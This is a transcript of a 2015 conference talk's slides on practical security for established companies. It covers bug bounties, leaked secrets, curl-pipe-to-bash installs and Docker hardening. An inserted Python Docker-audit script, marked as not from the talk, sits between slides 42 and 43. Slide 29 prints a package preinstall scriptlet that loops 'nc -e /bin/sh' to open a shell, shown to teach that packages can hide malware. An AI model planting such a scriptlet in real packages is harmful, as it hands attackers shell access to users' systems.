Security for non-unicorns

Bea Hughes
September 25, 2015


Security is becoming quite the thing nowadays; everyone wants to have one of them. The mantra that things should be built with security in mind, and that it can't be plastered on later, is a very important one if you're based in Silicon Valley and are about to write "teh new hotness". But what happens if your company is older than, say, 6 months? You already have some legacy systems and code. I'll be talking about how it's possible to unearth some of these things, what happens when you do uncover them, how to stop them happening, and coping strategies for dealing with them.




  1. Security For Non-Unicorns @benjammingh

  2. Who's this clown?
     • Infrastructure security charlatan at Etsy
     • Operations monkey at Puppet Labs
     • Survived a bunch of startups in London. (some of them still have websites...)
     • Has far too many opinions about pretty much everything on the TwitterNet @benjammingh

  3. Unicorns?

  4. Setlist
     • The problem(™).
     • The solution(s)(™).
     • The wrap up.
     • Rapturous applause.
     • We all go home/dance parties/our secret lives as superheroes & heroines.

  5. The problem: security is hard.

  6. From tiny seeds, do mighty acorns grow.
     • PinkiePwn's 6 small bugs in Chrome to full sandbox escape
     • Egor Homakov's 5 small bugs in GitHub to full private access on GitHub
     • from XSS to remote code execution in under an hour
     • Username & password stolen for HVAC system leads to $160+ Million Target breach.

  7. Things that aren't security are hard too.

  8. Computering is hard. No. 1 takeaway for security types is a sense of perspective.

  9. Security people aren't great secure coders.
     • Snort: 10 CVEs, Wireshark: 322! CVEs
     • Joxean Koret on Breaking Antivirus software
     • Security Firm Bit9 Hacked, Used to Spread Malware
     • Tavis Ormandy from Project Zero on exploiting ESET
     • BEST! FireEye just running Apache/PHP as root

  10. So who do I trust?
     • No one? Always a great position for security people, who don't want to get paid.
     • Everyone? Do I have a 419 email for YOU!
     • Security vendors? If you have infinite money and no attackers.
     • Attackers!

  11. "You're already being probed for security holes, do you want to know or not?"

  12. Bug bounties 101: Have one! Bug Crowd vs. HackerOne

  13. Bug bounties 102: Prepare a lot.

  14. Bug bounties 103: The first few weeks will be hell.

  15. Bug bounties 104: Be ready with bees!

  16. Security on the inside

  17. Armadillo security architecture

  18. Cloud

  19. GitHub

  20.

  21. But this doesn't happen in real life, right?

  22.

  23. Go use Gitrob • source-in-osint/

  24. curl | bash

  25. curl | sh

  26. "But I check them, obviously!"

  27.

  28. curl | bash "But this is no worse than packages."
     root# yum install sketchy

  29. curl | bash
     root# rpm -qp --scripts sketchy-1.33-7.rpm
     preinstall scriptlet (using /bin/sh):
     bash -c 'while : ; \
       do \
       nc -e /bin/sh 2222 ;\
       done'
  30. A LIVE DEMO, madness.

  31. Lightweight containers!

  32. chroot(8)

  33. FreeBSD Jails

  34. Solaris Zones

  35. AIX LPAR

  36.

  37. Is Docker secure?

  38. ">30% of Images in Docker Hub Contain High Priority Security Vulns" - Jayanth Gummaraju, Tarun Desikan and Yoshio Turner from BanyanOps

  39.

  40. As secure as Vagrant?

  41. But is Docker itself secure?
     • Don't run things as root.
     • No really, stop running things as root.
     • Did I mention not running things as root.
     • It is also not 1999. (Docker 1.8 addresses some of this, with its changes to who it runs as)

  42. Securify the Docker.
     • Don't use --privileged.
     • Use --cap-drop all and --cap-add <thing> to get the minimum capabilities.
     • Use Docker Notary
     • Use GRSecurity (just do that anyway, if you can.)
     • Use SELinux... I may as well ask for a pony here.
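An added example, not from the talk: it checks the rules of slides 41 and 42 (no root, no --privileged, drop all capabilities and add back only the minimum) against the JSON that `docker inspect` prints, run on a constructed two-container sample. The field names used are the ones `docker inspect` emits; the rule set itself is this example's assumption.

```python
import json
from typing import Dict, List

# Constructed `docker inspect` output, trimmed to the fields the audit reads;
# not captured from any real container.
SAMPLE_INSPECT = json.dumps([{
    "Name": "/sketchy",
    "Config": {"User": ""},
    "HostConfig": {"Privileged": True, "CapAdd": ["SYS_ADMIN"], "CapDrop": []},
}, {
    "Name": "/tidy",
    "Config": {"User": "1000:1000"},
    "HostConfig": {"Privileged": False, "CapAdd": ["NET_BIND_SERVICE"],
                   "CapDrop": ["ALL"]},
}])

def audit_container(c: dict) -> List[str]:
    """Return the slide-rule violations for one container record."""
    issues = []
    host = c.get("HostConfig") or {}
    user = ((c.get("Config") or {}).get("User") or "").strip()
    # Config.User is empty when neither the image nor `docker run -u` set a
    # user, which means the process runs as root.
    if user in ("", "0", "root") or user.startswith(("0:", "root:")):
        issues.append("runs as root (no non-root User)")
    if host.get("Privileged"):
        issues.append("--privileged grants all capabilities and host devices")
    drops = {d.upper() for d in host.get("CapDrop") or []}
    if "ALL" not in drops:
        issues.append("does not --cap-drop ALL; default capability set kept")
    adds = [a.upper() for a in host.get("CapAdd") or []]
    if "SYS_ADMIN" in adds:
        issues.append("--cap-add SYS_ADMIN is nearly root on the host")
    return issues

def audit_inspect(output: str) -> Dict[str, List[str]]:
    """Map container name to its findings for a `docker inspect` JSON array."""
    return {c["Name"].lstrip("/"): audit_container(c) for c in json.loads(output)}

if __name__ == "__main__":
    for name, issues in audit_inspect(SAMPLE_INSPECT).items():
        print(name, "OK" if not issues else "; ".join(issues))
```

Pipe `docker inspect $(docker ps -q)` into it to audit every running container on a host.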
  43. Summary
     • Computers are apparently hard.
     • Security is clearly harder still, obv.
     • Actually trust and humans is hard.
     • The typing is the easy bit. (ish)

  44. More Summary
     • Complex systems lead to much more complex security problems. (see OAuth)
     • Annual pen-tests don't scale, bug bounties can.
     • Attackers are mining any public info you have (GitHub, S3)
     • I beg you to stop trusting curl.
     • Docker and security can be used in the same sentence.

  45. Thank you! Twidder: @benjammingh LinkedIn: FidoNet: 2:254/524.13 JitHub: SpeakerDeck: Etsy: Careers CodeAsCraft